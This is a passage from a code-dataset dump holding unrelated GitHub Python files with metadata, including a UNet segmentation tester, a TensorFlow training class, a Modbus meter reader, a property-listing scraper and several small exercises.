setup(**configuration(top_path='').todict())\n\n","repo_name":"pombreda/pyamg","sub_path":"pyamg/amg_core/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"41254391038","text":"\"\"\"Functions that deal with geographic data that does not vary over time\n\nThis type of data varies based on geography, but does not differ across\ndifferent time periods (or at least not on a relevant scale). For instance,\na raster of euclidean distance to airports would be included in this category\n\"\"\"\n\nfrom s3_utils import get_from_s3\nfrom raster_utils import raster_to_array\nimport numpy as np\n\n\ndef tiff_to_array(path):\n \"\"\"Function that loads a geotiff into a numpy array\n\n Args:\n path (str): s3 or local path to load tiff from\n\n Returns:\n numpy array\n \"\"\"\n\n if path.startswith('s3'):\n local_raster_path = get_from_s3(path)\n else:\n local_raster_path = path\n\n return raster_to_array(local_raster_path)\n\n\ndef get_mask_indices(path):\n \"\"\"Helper function to get raster mask for NYC\n\n Returns:\n list: returns list of tuples (row, column) that represent area of interest\n \"\"\"\n raster = tiff_to_array(path)\n indices = []\n it = np.nditer(raster, flags=['multi_index'])\n while not it.finished:\n if it[0] == 1:\n r, c = it.multi_index\n indices.append((r, c))\n it.iternext()\n return indices\n","repo_name":"notthatbreezy/nyc-taxi-spark-ml","sub_path":"python/geo_vars.py","file_name":"geo_vars.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"82"} +{"seq_id":"39634058777","text":"\"\"\"\nhttps://atcoder.jp/contests/abc210/tasks/abc210_c\n\"\"\"\n\nN, K = map(int, input().split())\ncandies = list(map(int, input().split()))\n\nfrom collections import deque\nfrom collections import defaultdict as dd\nq = deque()\ncolors = dd(lambda: 0)\n\nmax_kinds = 0\nfor i in range(N):\n current_color = candies[i]\n q.append(current_color)\n colors[current_color] += 1\n if i >= K:\n old_color = q.popleft()\n colors[old_color] -= 1\n if colors[old_color] == 0:\n del colors[old_color]\n max_kinds = max(max_kinds, len(colors))\n\nprint(max_kinds)\n","repo_name":"sugirin/AtCoder","sub_path":"src/abc210/abc210_c.py","file_name":"abc210_c.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"8881620836","text":"from django.test import TestCase\nfrom django.utils.crypto import get_random_string\n\nfrom custom_auth.models import User\nfrom .. 
import models\n\n\nclass TestCaseWithUser(TestCase):\n    username = None\n    user = None\n\n    @classmethod\n    def setUpTestData(cls):\n        cls.username = get_random_string(length=10)\n\n        User.objects.create(\n            username=cls.username,\n            password=get_random_string(length=10)\n        )\n\n    def setUp(self):\n        self.user = User.objects.get(username=self.__class__.username)\n        self.assertIsNotNone(self.user)\n\n\nclass TestCaseWithFileSystem(TestCaseWithUser):\n    parent_name = None\n    parent_dir = None\n\n    @classmethod\n    def setUpTestData(cls):\n        super().setUpTestData()\n        cls.parent_name = get_random_string(length=10)\n\n        models.Directory.objects.create(\n            name=cls.parent_name,\n            owner=User.objects.get(username=cls.username)\n        )\n\n    def setUp(self):\n        super().setUp()\n        self.parent_dir = models.Directory.objects.get(name=self.__class__.parent_name)\n        self.assertIsNotNone(self.parent_dir)","repo_name":"margdoc/awww-framac","sub_path":"mainpage/tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"73014855310","text":"import torch\nfrom TrainSegmentationNetwork.Train_UNet import calc_loss\nfrom TrainSegmentationNetwork.UNetLoader_dynamic import UNetDatasetDynamicMask\nfrom UNet.PlotSegmentationResults import plot_result\nfrom UNet.BatchNormUNet import UNet\nfrom argparse import ArgumentParser\nimport re\nfrom collections import defaultdict\nimport numpy as np\nimport skimage\nimport skimage.segmentation as seg\nimport skimage.filters as filters\nimport skimage.morphology as morph\nfrom PIL import Image\nfrom TrainSegmentationNetwork.IntersectionOverUnion import calculateIoU\nfrom torch.nn.functional import softmax\n\n\"\"\"\nMartin Leipert\nmartin.leipert@fau.de\n\n\"\"\"\n\n\nBATCH_SIZE = 1\n\nNUM_CLASSES = 4\n\nTEST_LOSSES_WEIGHTING = {\n\t\"BCE_LOSS\": 1,\n\t\"DICE_LOSS\": 1,\n\t\"FOCAL_LOSS\": 1\n}\n\n\ndef main():\n\targ_parser = ArgumentParser(\"Test the Unet on the defined test data\")\n\targ_parser.add_argument(\"model_name\", help=\"pth file to the model\")\n\n\tparsed_args = arg_parser.parse_args()\n\n\tmodel_name = parsed_args.model_name\n\n\tset_name = \"small_set\"\n\n\tfile_list_test = \"/home/martin/Forschungspraktikum/Testdaten/Segmentation_Sets/%s/test.txt\" % set_name\n\n\ttest_data = UNetDatasetDynamicMask(file_list_test, region_select=False)\n\ttest_loader = torch.utils.data.DataLoader(test_data, batch_size=BATCH_SIZE)\n\n\t# Evaluate on CUDA if possible\n\tdevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\tmodel_network = UNet(NUM_CLASSES)\n\tmodel_network.load_state_dict(torch.load(\"TrainedModels/%s\" % model_name))\n\tmodel_network.to(device)\n\n\tbase_name = model_name.rstrip(\".pth\")\n\n\tmetrics = defaultdict(float)\n\t# {'focal': 0, 'dice': 0, 'bce': 0, 'loss': 0}\n\n\tmodel_network.eval()\n\t# disable gradient tracking for evaluation (torch.no_grad() only takes effect as a context manager)\n\ttorch.set_grad_enabled(False)\n\n\n\tloss_sum = 0\n\n\tconfusion = np.zeros([4, 2])\n\n\tground_truth = np.zeros([4])\n\n\tiou = np.zeros((4, 1))\n\n\t# Testings\n\tfor images, masks, image_paths in test_loader:\n\t\timages = images.to(device)\n\t\tmasks = masks.to(device)\n\n\t\t# forward\n\t\t# track history if only in train\n\t\toutputs = model_network(images)\n\t\toutputs = outputs.detach()\n\t\tmasks = masks.detach()\n\t\timages = images.detach()\n\n\t\tloss = calc_loss(outputs, masks, metrics, TEST_LOSSES_WEIGHTING)\n\n\t\t# Update the losses\n\t\tloss_sum += loss / len(images)\n\n\t\tplot_result(outputs, images, base_name, 
image_paths)\n\n\t\tthis_confusion, gt, this_iou = get_segmented_area(outputs, masks, images, image_paths)\n\t\tconfusion = np.add(confusion, this_confusion)\n\t\tground_truth = np.add(ground_truth, gt)\n\t\tiou += this_iou\n\n\tiou = iou / len(test_loader.dataset.input_images)\n\tconfusion = confusion / len(test_loader.dataset.input_images)\n\tground_truth = ground_truth / len(test_loader.dataset.input_images)\n\tprint(\"Ground truth\")\n\tprint(ground_truth)\n\n\tprint(f\"Overall loss {loss_sum.cpu().item()}\")\n\n\tprint(\"IOU: %.5f\\t\\t%.5f\\t\\t%.5f\\t\\t%.5f\\n\" % tuple(iou[:, 0]))\n\tdenote_result(base_name, loss_sum, metrics, confusion, iou)\n\n\ndef get_segmented_area(prediction, org_mask, raw_images, image_paths):\n\n\tprediction = torch.sigmoid(prediction.double())\n\tprediction = softmax(prediction, 1)\n\tprediction = prediction.cpu().numpy()\n\n\n\torg_mask = org_mask.detach().cpu().numpy()\n\traw_images = raw_images.detach().cpu().numpy()\n\n\tiou = calculateIoU(prediction, org_mask)\n\n\tclass_labels = np.argmax(prediction, axis=1)\n\n\timage_size = 224*224\n\n\tfull_confusion = np.zeros([4, 2])\n\tground_truth = np.zeros(4)\n\n\tfor i in range(prediction.shape[0]):\n\n\t\tlocal_mask = org_mask[i, :, :, :]\n\t\tmask_labels = np.argmax(local_mask, axis=0)\n\t\tlocal_labels = class_labels[i, :, :]\n\n\t\timage = raw_images[i, :, :]\n\t\traw_im = np.zeros(list(image.shape[1:3]) + [3])\n\n\t\tfor i in range(3):\n\t\t\traw_im[:, :, i] = image[i, :, :]\n\n\t\timage = Image.fromarray(np.uint8(raw_im*256))\n\t\timage = image.convert(\"L\")\n\t\t# threshold on the numpy array; comparing the PIL image object directly raises a TypeError\n\t\timg_arr = np.array(image)\n\t\tthresh = filters.threshold_otsu(img_arr)\n\t\ttext_or_sign = img_arr < thresh\n\t\tbackground = img_arr > thresh\n\n\t\tconfusion = np.zeros([4, 2])\n\t\tfor i in range(4):\n\t\t\tground_truth[i] += np.where(mask_labels == i, 1, 0).sum(0).sum(0) / image_size\n\n\t\t\tcorrect = np.where(np.logical_and(local_labels == i, mask_labels == i), 1, 0).sum(0).sum(0) / image_size\n\t\t\tfalse = np.where(np.logical_and(local_labels == i, mask_labels != i), 1, 0).sum(0).sum(0) / image_size\n\n\t\t\tconfusion[i, 0] = correct\n\t\t\tconfusion[i, 1] = false\n\n\t\t\tpass\n\t\tfull_confusion = np.add(full_confusion, confusion)\n\n\t\"\"\"\n\t# Missclassified area:\n\tsubtraction = new_mask - org_mask\n\tsubtraction = np.where(subtraction < 0, 0, subtraction)\n\n\tmissclassified = subtraction.sum(axis=0).sum(axis=0)\n\torg_images = []\n\n\tfor raw_im in raw_images:\n\n\t\timage = Image.open(org_im)\n\t\timage = image.convert(\"L\")\n\n\t\t# Correctly classified area:\n\t\t# Use Otsu thresholding\n\n\t\timage = Image.fromarray(raw_im)\n\n\t\tsegmented = filters.threshold_otsu(image)\n\t\tmorph.binary_dilation(segmented, out=segmented)\n\t\torg_images.append(segmented)\n\n\t\"\"\"\n\treturn full_confusion, ground_truth, iou\n\n\ndef denote_result(base_name, loss, metrics, confusion, iou):\n\n\twith open(f\"Results/{base_name}_test_result.txt\", \"w+\") as open_file:\n\t\topen_file.write(f\"Loss on Test_data{loss}\\n\")\n\t\topen_file.write(f\"BCE Loss on Test_data{metrics['BCE_LOSS']}\\n\")\n\t\topen_file.write(f\"Dice Loss on Test_data{metrics['DICE_LOSS']}\\n\")\n\t\topen_file.write(f\"Focal Loss on Test_data{metrics['FOCAL_LOSS']}\\n\")\n\t\topen_file.write(\"\\n\")\n\t\topen_file.write(\"----- Confusion: -----\\n\")\n\t\tfor i in range(4):\n\t\t\topen_file.write(\"%i: %.5f | %.5f \\n\" % (i, confusion[i, 0], confusion[i, 1]))\n\n\t\topen_file.write(\"\\n\")\n\t\topen_file.write(\"IOU: %.5f\\t\\t%.5f\\t\\t%.5f\\t\\t%.5f\\n\" % tuple(iou[:, 0]))\n\n\nif 
__name__ == '__main__':\n\tmain()\n","repo_name":"martinleipert/Forschungspraktikum","sub_path":"TrainSegmentationNetwork/TestUNetOnData.py","file_name":"TestUNetOnData.py","file_ext":"py","file_size_in_byte":5510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"25845686288","text":"#!/usr/bin/python\n\nimport minimalmodbus\n\nrs485 = minimalmodbus.Instrument('/dev/cu.usbserial-FTYXZ40E', 1)\nrs485.serial.baudrate = 9600\nrs485.serial.bytesize = 8\nrs485.serial.parity = minimalmodbus.serial.PARITY_NONE\nrs485.serial.stopbits = 1\nrs485.serial.timeout = 1\nrs485.debug = False\nrs485.mode = minimalmodbus.MODE_RTU\n#print(rs485)\n\nSimple_Voltage = rs485.read_long(50520, functioncode=3, signed=False) / 100.0 # U32 V/100\nFrequency = rs485.read_long(50526, functioncode=3, signed=False) / 100.0 # U32 Hz/100\nCurrent = rs485.read_long(50528, functioncode=3, signed=False) / 1000.0 # U32 A/1000\nSum_Active_Power = rs485.read_long(50536, functioncode=3, signed=True) / 0.1 # S32 W/0.1\nSum_Reactive_Power = rs485.read_long(50538, functioncode=3, signed=True) / 0.1 # S32 VAr/0.1\nSum_Apparent_Power = rs485.read_long(50540, functioncode=3, signed=False) / 0.1 # U32 VA/0.1\nSum_Power_Factor = rs485.read_long(50542, functioncode=3, signed=True) / 1000 # S32 -/1000\nActive_Power_Phase1 = rs485.read_long(50544, functioncode=3, signed=True) / 0.1 # S32 W/0.1\nReactive_Power_Phase1 = rs485.read_long(50550, functioncode=3, signed=True) / 0.1 # S32 var/0.1\nApparent_Power_Phase1 = rs485.read_long(50556, functioncode=3, signed=False) / 0.1 # U32 VA/0.1\nPower_Factor_Phase1 = rs485.read_long(50562, functioncode=3, signed=True) / 1000 # U32 -/1000\n\nActive_Energy = rs485.read_long(36868, functioncode=3, signed=False) # U32 Wh\n\nprint('Simple Voltage: {0:.2f} Volts'.format(Simple_Voltage))\nprint('Frequency: {0:.2f} Hz'.format(Frequency))\nprint('Current: {0:.3f} Amps'.format(Current))\nprint('Sum Active Power: {0:.1f} Watts'.format(Sum_Active_Power))\nprint('Sum Reactive Power: {0:.1f} VAr'.format(Sum_Reactive_Power))\nprint('Sum Apparent Power: {0:.1f} VoltAmps'.format(Sum_Apparent_Power))\nprint('Sum Power Factor: {0:.3f}'.format(Sum_Power_Factor))\nprint('Active Power Phase 1: {0:.1f} Watt'.format(Active_Power_Phase1))\nprint('Reactive Power Phase 1: {0:.1f} Watt'.format(Reactive_Power_Phase1))\nprint('Apparent Power Phase 1: {0:.1f} Watt'.format(Apparent_Power_Phase1))\nprint('Power Factor Phase 1: {0:.1f}'.format(Power_Factor_Phase1))\nprint('Active Energy: {0:.3f} kWh'.format(Active_Energy / 1000.0))\n","repo_name":"Smeedy/python_countis_e03_rs485","sub_path":"countis_e03.py","file_name":"countis_e03.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"21557008527","text":"# var=int(input(\"enter the number\"))\n# if var>0:\n# print(\"var is positive\")\n# elif var<0:\n# print(\"var is negative\")\n# # elif var==0:\n# else:\n# print(\"zero\")\n# else:\n# print(\"neutral\")\n\n\n# print(2+9*((3*12)-8)/10)\n# 2+9*(36-8)/10\n# 2+9*28/10\n# 2+9*2.8\n# 2+25.2\n# 27.2\n\ni=10\nwhile i>=-9:\n # if i%10==0:\n print(i)\n i=i-1","repo_name":"SarikaJha/If_Else","sub_path":"Positive_negative_zero_if-else.py","file_name":"Positive_negative_zero_if-else.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} 
+{"seq_id":"73196437390","text":"\n####################################################################\n######################### Class: TreeNode ##########################\n####################################################################\n\nclass TreeNode():\n def __init__(self, state, parent, expand_width=12):\n self.children = {}\n self.state = state\n self.isTerminal = state.isTerminal()\n self.parent = parent\n self.numVisits = 0\n self.rolloutReward = 0\n self.mReward = 0\n self.expand_width = expand_width\n\n def isFullyExpanded(self):\n if len(self.children) == self.expand_width:\n return True\n else:\n return False","repo_name":"stoneyangzh/madrl-trading","sub_path":"feature_selection/tree_node.py","file_name":"tree_node.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"37712978982","text":"from L1366_RankTeamsbyVotes import f_gold\n\n##########\n# ++++++ to be replaced by tester ++++++\nmylog = print\nmyexactlog = print\n\"+++++++++++++++++\"\n\ndef test():\n \"--- test function ---\"\n param = [\n # example 1\n [[\"ABC\", \"ACB\", \"ABC\", \"ACB\", \"ACB\"]]\n # output: \"ACB\"\n # EXPLANATION: Team A was ranked first place by 5 voters. No other team was voted as first place so team A is the first team. Team B was ranked second by 2 voters and was ranked third by 3 voters. Team C was ranked second by 3 voters and was ranked third by 2 voters. As most of the voters ranked C second, team C is the second team and team B is the third.\n ,\n # example 2\n [[\"WXYZ\", \"XYZW\"]]\n # output: \"XWYZ\"\n # EXPLANATION: X is the winner due to tie-breaking rule. X has same votes as W for the first position but X has one vote as second position while W doesn't have any votes as second position.\n ,\n # example 3\n [[\"ZMNAGUEDSJYLBOPHRQICWFXTVK\"]]\n # output: \"ZMNAGUEDSJYLBOPHRQICWFXTVK\"\n # EXPLANATION: Only one voter so his votes are used for the ranking.\n ,\n ]\n for i, parameters_set in enumerate(param):\n idx = i\n mylog(0, idx)\n result = f_gold(* parameters_set)\n myexactlog(1, result)\n\n##########\n\ntest()\n","repo_name":"HALOCORE/DuoGlot","sub_path":"data/duoglot/tests/staleetcode/pysep/L1366_RankTeamsbyVotes__test.py","file_name":"L1366_RankTeamsbyVotes__test.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"83"} +{"seq_id":"28150763427","text":"from bs4 import BeautifulSoup\nimport requests\nfrom csv import writer\nurl='https://www.property24.co.ke/property-for-sale-in-nairobi-c1890'\npage=requests.get(url)\nsoup=BeautifulSoup(page.content,'html.parser')\nlists=soup.find_all('div',class_=\"pull-left sc_listingTileContent\")\nwith open('house.csv','w',encoding='utf8',newline='') as f:\n thewriter=writer(f)\n header=['Title','Location','Describition','Price']\n thewriter.writerow(header)\n \n for list in lists:\n title=list.find('div',class_=\"sc_listingTileAddress\").text\n location=list.find('div',class_= \"sc_listingTileAddress\").text\n details=list.find('div', class_=\"sc_listingTileTeaser\").text\n ksh= list.find('span').text\n info=[title,location,details,ksh]\n thewriter.writerow(info)\n \n","repo_name":"tinajs2018/webs-scatping","sub_path":"Webscarping to csv/scarpe.py","file_name":"scarpe.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"40155539406","text":"import 
datetime\nimport math\n\n# Third-party libraries\nimport numpy as np\nimport tensorflow as tf\n\n# Own package\nfrom add_ons import time_estimation, shuffle_data\nfrom define_layers import neural_network_model\n\n# Defines a neural network - the only function so far is 'training'\nclass NeuralNetwork(object):\n def __init__(self, specs, save):\n\n # All prior defined specifications are now saved to the network class\n self.name = specs[\"name\"]\n\n self.batch_size = specs[\"batch_size\"]\n self.total_epochs = specs[\"total_epochs\"]\n\n self.optimizer_name = specs[\"optimizer_name\"]\n self.learning_rate = specs[\"learning_rate\"]\n self.activation_function = specs[\"activation_function\"]\n\n self.fc_neurons = list(specs[\"fc_neurons\"])\n self.conv_neurons = list(specs[\"conv_neurons\"])\n self.conv_pad = specs['conv_pad']\n self.pooling = specs[\"pooling\"]\n\n self.regularization = specs[\"regularization\"]\n self.beta = specs[\"beta\"]\n\n self.components = specs[\"components\"]\n self.tensorboard_dir = specs[\"tensorboard_dir\"]\n self.cropping = specs[\"cropping\"]\n self.width = specs[\"dimension\"][0]-2*self.cropping\n self.height = specs[\"dimension\"][0]-2*self.cropping\n\n self.gpu = specs[\"gpu\"]\n\n self.add_info = specs[\"add_info\"]\n self.add_info_layer = specs[\"add_info_layer\"]\n\n # Includes information of saving, early stopping, time_estimation or not\n self.flag = {\"early_stopping\": specs[\"early_stopping\"],\n \"early_stopping_costumized\": specs['early_stopping_costumized'],\n \"learning_rate_decay\": specs['learning_rate_decay'],\n \"time_estimation\": True,\n \"save\": False,\n \"save_net\": False}\n\n if save:\n self.file_dir = specs[\"file_dir\"]\n\n self.flag[\"save\"] = True\n\n # Training the network - only information needed is the data\n def train_neural_network(self, tr, va, te):\n if self.flag[\"save\"]:\n print(\"Classifier \"+str(self.name)+\" will be tuned.\\n\")\n\n train_x = tr[\"features\"]\n train_y = tr[\"label\"]\n train_name = tr[\"id\"]\n train_ai = tr[\"add_info\"]\n\n tf.reset_default_graph()\n # all calculations are saved and performed on one GPU - is garantied in run.py already\n with tf.device('/device:GPU:'+str(self.gpu)):\n\n # input\n x = tf.placeholder('float', [None, self.width, self.height], name=\"x\")\n # if CNN are used (so the list is non-empty) the input is an image - otherwise a vector\n if self.conv_neurons:\n x_net = tf.reshape(x, [-1, self.width, self.height, 1])\n else:\n x_net = tf.reshape(x, [-1, self.width * self.height])\n # output \n y = tf.placeholder('float', [None, len(train_y[0])], name=\"labels\")\n # additional information as input\n a = tf.placeholder('float', [None, len(train_ai[0])], name=\"a\")\n\n # setting up the network; conv layers, fully conected layers, which activiation, etc\n prediction, weights = \\\n neural_network_model(x_net, a, self.add_info_layer,\n len(train_y[0]), self.fc_neurons, self.conv_neurons, self.conv_pad,\n self.activation_function, self.pooling, self.width, self.height)\n\n # cost function with cross entropy (mean is an alternative)\n with tf.name_scope(\"cost\"): # names the scope for TensorBoard\n reg = 0\n if self.regularization: # if specified the L2-regularization on weights will be done\n for weight in weights:\n reg += tf.nn.l2_loss(weight)\n # cost function of the network\n cost = tf.add(\n tf.reduce_mean(\n tf.nn.softmax_cross_entropy_with_logits_v2(logits=prediction, labels=y)),\n tf.multiply(self.beta, reg))\n # write it to Tensorboard to review it later\n 
tf.summary.scalar(\"cost\", cost)\n\n # either Adam Optimizer od SGD; as defined in specifications\n # learning rate can be reduced if defined - more further down\n with tf.name_scope(\"train\"): # names the scope for TensorBoard\n if self.optimizer_name == \"Adam\":\n optimizer = tf.train.AdamOptimizer(self.learning_rate).minimize(cost)\n else:\n optimizer = tf.train.GradientDescentOptimizer(self.learning_rate).minimize(cost)\n\n # accuracy is here defined as the rate of how many samples are classified correctly\n # this was defined as the evaluation method for binary classifier \n # See Thesis document for more explanation\n with tf.name_scope(\"accuracy\"): # names the scope for TensorBoard\n correct = tf.equal(tf.argmax(prediction, 1), tf.argmax(y, 1))\n accuracy = tf.reduce_mean(tf.cast(correct, tf.float32))\n tf.summary.scalar(\"accuracy\", accuracy)\n\n merged_summary = tf.summary.merge_all()\n\n # Some more information can be printed and defined ofr Tensorflow\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True # Just use the Memory of the GPU as needed (False = everything)\n config.allow_soft_placement = True # If some of the calculations require to be placed on CPU\n # then this is done automatically\n config.log_device_placement = False # prints where each calculation (as cost, accurac, etc) is placed\n\n # start the actual training\n with tf.Session(config=config) as sess:\n # initialization is needed; otherwise errors\n sess.run(tf.global_variables_initializer())\n # define the tensorboard writer for training, validation and test\n # set the folder as subfolder of the network folder\n if self.flag[\"save\"]:\n train_writer = tf.summary.FileWriter(self.file_dir+str(self.name)+'/train')\n train_writer.add_graph(sess.graph)\n val_writer = tf.summary.FileWriter(self.file_dir+str(self.name)+'/validation')\n val_writer.add_graph(sess.graph)\n test_writer = tf.summary.FileWriter(self.file_dir+str(self.name)+'/test')\n test_writer.add_graph(sess.graph)\n\n # A step is needed to be able to compare different trained networks\n tensorboard_step = 0\n # these varibales help to calculate the training accuracy and cost\n # if all data used it will crash the program, if just one batch it is not accurate enough (in 1/batch_size percente)\n tensor_batch_x = np.empty([0, self.width, self.height])\n tensor_batch_ai = np.empty([0, len(train_ai[0])])\n tensor_batch_y = np.empty([0, len(train_y[0])])\n # Helps early stopping\n min_val_cost_epoch = 0\n min_val_cost = 10**10\n # Helps learning rate adjustment\n min_train_cost_epoch = 0\n min_train_loss = 10**10\n # helps to calculate run time estimation which hits after 10 % of run epochs\n # Note does not work with early stopping\n ping = datetime.datetime.now()\n\n # Time to run all the training epochs\n for epoch in range(self.total_epochs):\n epoch_loss = 0\n i = 0\n\n # time estimation is done here\n percentage = 0.1\n if epoch >= percentage * self.total_epochs and self.flag['time_estimation']: # estimate for run time\n self.flag['time_estimation'] = time_estimation(ping, percentage=percentage)\n\n # shuffle the training data \n train_x, train_y, train_name, train_ai = shuffle_data(train_x, train_y, train_name, train_ai)\n \n # Run over the training set, batch by batch\n # last samples are disregarded (if samples % batch_size != 0)\n while i < len(train_x) - self.batch_size:\n start = i\n end = i+self.batch_size\n\n # grep a batch of samples\n batch_x = np.array(train_x[start:end])\n batch_y = np.array(train_y[start:end])\n 
batch_ai = np.array(train_ai[start:end])\n\n # Run the optimizer\n _, c, _ = sess.run([optimizer, cost, prediction],\n feed_dict={x: batch_x, y: batch_y, a: batch_ai})\n epoch_loss += c\n\n i += self.batch_size\n\n # Add information for TensorBoard\n if self.flag[\"save\"]:\n if tensorboard_step % int(len(train_x)/10000.) == 0: \n # reducing the size of summary file so that just every now and then a summary is written\n tensor_batch_x = np.concatenate((tensor_batch_x, batch_x), axis=0)\n tensor_batch_ai = np.concatenate((tensor_batch_ai, batch_ai), axis=0)\n tensor_batch_y = np.concatenate((tensor_batch_y, batch_y), axis=0)\n if tensorboard_step % int(len(train_x)/250.) == 0:\n # reducing the size of summary file so that just every now and then a summary is written\n s = sess.run(merged_summary,\n feed_dict={x: va[\"features\"], y: va[\"label\"], a: va[\"add_info\"]})\n val_writer.add_summary(s, tensorboard_step)\n s = sess.run(merged_summary,\n feed_dict={x: te[\"features\"], y: te[\"label\"], a: te[\"add_info\"]})\n test_writer.add_summary(s, tensorboard_step)\n s = sess.run(merged_summary,\n feed_dict={x: tensor_batch_x, y: tensor_batch_y, a: tensor_batch_ai})\n train_writer.add_summary(s, tensorboard_step)\n # clear the training batch variables\n tensor_batch_x = np.empty([0, self.width, self.height])\n tensor_batch_ai = np.empty([0, len(train_ai[0])])\n tensor_batch_y = np.empty([0, len(train_y[0])])\n\n tensorboard_step += 1\n\n # early stopping if 20 epochs did not gain any improvements on validation cost\n if self.flag['early_stopping']:\n # calculate current validation cost\n current_val_cost = cost.eval({x: va[\"features\"], y: va[\"label\"], a: va[\"add_info\"]})\n if current_val_cost < min_val_cost: # if new minimum of cost on validation overwrite min\n min_val_cost_epoch = epoch\n min_val_cost = current_val_cost\n if self.flag['save_net']: # this flag hits if an improvement hits after 5 epochs of non-imporvements\n self.save_network(sess, tensorboard_step)\n\n if epoch - min_val_cost_epoch >= 5 and self.flag['save']: # save the network structure\n # if an imporvement after 5 non-imporvements\n self.flag['save_net'] = True\n\n # this early stopping is done so that networks with different batch_sizes can be compared\n # Advisable to set to False\n if self.flag['early_stopping_costumized']:\n if epoch - min_val_cost_epoch > 20 * math.sqrt(self.total_epochs/64.):\n print(20 * math.sqrt(self.total_epochs/64.))\n print(\"Early stop at epoch \" + str(epoch) + '.\\n')\n break\n elif epoch - min_val_cost_epoch > 20:\n print(\"Early stop at epoch \" + str(epoch) + '.\\n')\n break\n # learning rate reduction\n # normalised loss function\n if self.flag[\"learning_rate_decay\"]:\n # receive a costum batch of samples\n batch_x = np.array(train_x[:5000])\n batch_y = np.array(train_y[:5000])\n batch_ai = np.array(train_ai[:5000])\n # calculate the cost for the training batch\n current_train_loss = cost.eval(feed_dict={x: batch_x, y: batch_y, a: batch_ai})\n if current_train_loss < min_train_loss:\n # save new minimum on loss - actually redundant\n min_train_loss = current_train_loss\n # every quarter of training reduce the learning rate to 25% (coincendece that both is divided by 4)\n if epoch - min_train_cost_epoch > self.total_epochs / 4:\n self.learning_rate /= 4.\n min_train_cost_epoch = epoch\n # Occasionally report accuracy (every 5th epoch)\n if (epoch+1) % 5 == 0:\n print('Epoch '+str(epoch+1)+' completed out of '+str(self.total_epochs)+' loss: '+str(epoch_loss))\n print('Accuracy on 
validation data: ' +\n                          str(accuracy.eval({x: va[\"features\"], y: va[\"label\"], a: va[\"add_info\"]})*100)+'\\n')\n\n            print('Accuracy on test data: ' +\n                  str(accuracy.eval({x: te[\"features\"], y: te[\"label\"], a: te[\"add_info\"]})*100) +\n                  \" %\")\n            if self.flag['save'] and not self.flag['save_net']:  # hits if the network was not saved prior\n                self.save_network(sess, tensorboard_step)\n\n            print(\"\\nYuhu, we are done training this network!\\n\\n\\n\\n\")\n\n    # defines the saving network routine\n    # thereby the weights, biases and so on are saved so that they can be used for classification later on\n    def save_network(self, sess, t_step):\n        saver = tf.train.Saver()\n        print('Saving current model...\\n')\n        # network is saved in a subfolder (called 'network') in the parent network folder\n        saver.save(sess,\n                   self.file_dir + str(self.name) + '/network/' + str(self.name),\n                   global_step=t_step)\n","repo_name":"EricKolibacz/component_image_classifiction","sub_path":"neural_network.py","file_name":"neural_network.py","file_ext":"py","file_size_in_byte":14734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"42467276915","text":"from util import *\n\n\ndef rewrite(Sum, self):\n    [*args], *limits = self.of(Sum[Mul])\n    for i, cond in enumerate(args):\n        if cond.is_Probability:\n            cond = cond.of(Probability)\n            break\n    else:\n        return\n    \n    del args[i]\n    \n    fx = Mul(*args)\n    \n    if isinstance(cond, tuple):\n        cond, *weights = cond\n    else:\n        weights = ()\n\n    if cond.is_Conditioned:\n        cond, given = cond.args\n    else:\n        given = None\n\n    if cond.is_And:\n        cond = cond.args\n    else:\n        cond = [cond]\n\n    for cond in cond:\n        x, x_var = cond.of(Equal)\n        assert x.is_random\n        _fx = fx._subs(x_var, x)\n        assert _fx != fx\n        fx = _fx\n\n    return Expectation(fx, *weights, given=given)\n\n@apply\ndef apply(self):\n    return Equal(self, rewrite(Sum, self))\n\n\n@prove\ndef prove(Eq):\n    from axiom import stats\n\n    n = Symbol(integer=True, positive=True)\n    θ = Symbol(real=True, shape=(n, n))\n    f = Function(real=True)\n    x, s = Symbol(integer=True, random=True)\n    Eq << apply(Sum[x.var](Probability[x:θ](x | s) * f(x.var)))\n\n    Eq << Eq[-1].this.rhs.apply(stats.expect.to.sum)\n\n    \n\n\nif __name__ == '__main__':\n    run()\n# created on 2023-04-02\n","repo_name":"cosmosZhou/axiom","sub_path":"axiom/stats/sum/to/expect.py","file_name":"expect.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"7122761657","text":"# Import the redis module\nimport redis\n# Import the time module\n# import time\n\n# Connect to the redis database\n# r = redis.StrictRedis(host='127.0.0.1', port=6379,db=0, decode_responses=True)\npool = redis.ConnectionPool(host='127.0.0.1', port=6379,db=0)\nr = redis.Redis(connection_pool=pool)\n\n# print(type(r.zrange('tag:2,KPIHOIL',0, -1)))\n# print(r.zrange('tag:2,1020-AI1001',0, -1))\nline = r.zrange('tag:2,KPIHOIL_PV',0, -1)\nprint(line)\ndata = []\nfor i in range(0, len(line)):\n    s = line[i].decode('utf-8').split(';')[1]\n    data.append(s)\nprint(data)\n# print(type(line[0]))\n# print(line[0])\n# s = line[0].decode('utf-8')\n\n# print(type(s))\n# 